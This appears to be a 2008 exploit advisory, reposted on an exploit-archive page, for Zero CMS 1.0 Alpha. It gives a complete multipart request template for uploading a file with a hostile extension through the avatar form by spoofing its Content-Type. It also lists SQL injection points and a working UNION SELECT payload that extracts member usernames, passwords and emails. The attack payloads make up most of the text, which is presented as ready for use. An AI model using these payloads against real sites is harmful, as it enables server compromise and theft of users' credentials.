Home / os / win10

zerocms-sql.txt

Posted on 08 January 2008

[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|    ____            __________         __             ____  __      |
|  /_   | ____     |__\_____    _____/  |_          /_   |/  |_     |
|   |   |/        |  | _(__  <_/ ___   __  ______  |      __    |
|   |   |   |     |  |/         \___|  |   /_____/  |   ||  |      |
|   |___|___|  /\__|  /______  /\___  >__|            |___||__|      |
|            /\______|      /     /                               |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|    Zero CMS Remote Arbitrary File Upload / SQL Injections          |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|			Version: <= 1.0 Alpha (Last)                  |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|			Vendor: www.zero-cms.com                      |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|			Discovered by: KiNgOfThEwOrLd                 |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|				Intro:                                |
|                                                                    |
| An attacker can bypass the avatar upload extension filter editing  |
|  the contenet type propriety                                       |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|				Exploit:                              |
|                                                                    |
| Submit to index.php?act=usercp&action=avatar a request like this:  |
|                                                                    |
|	-----------------------------4629606643545053171986629955
 |
|	Content-Disposition: form-data; name="MAX_FILE_SIZE"
      |
|	
                                                          |
|	20000
                                                     |
|	-----------------------------4629606643545053171986629955
 |
|	Content-Disposition: form-data; name="avupload"; filename="   |
|	[FILENAME].[EVIL_EXTENSION]"
                              |
|	Content-Type: image/jpeg
 				      |
|	
							      |
|	[EVIL_CODE]
						      |
|	
							      |
|	-----------------------------4629606643545053171986629955
 |
|	Content-Disposition: form-data; name="submit"
	      |
|	
							      |
|	Upload
						      |
|	-----------------------------4629606643545053171986629955-
|
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| 				SQL Injections:                       |
|                                                                    |
| The most of the variable related with the database are not properly|
| checked. Then, we get a lots of possible sql injections.           |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|				Some Examples:                        |
|                                                                    |
|			index.php?act=poll&mode=view&id=%27           |
|			forums/index.php?f=%27                        |
|			forums/index.php?t=%27                        |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|      		    An Exploit Example:                       |
|		                                                      |
| index.php?act=poll&mode=view&id=9999+union+all+select+1,username,  |
| password,email,5,6,7,8,9,10,11,12,13,14+from+zc_members            |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Surelly there are other not filtred vars, but i don't feel like to |
| check, if u want u can find that yourself, dont you? :P            |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]

 

TOP

Malware :

Exploits :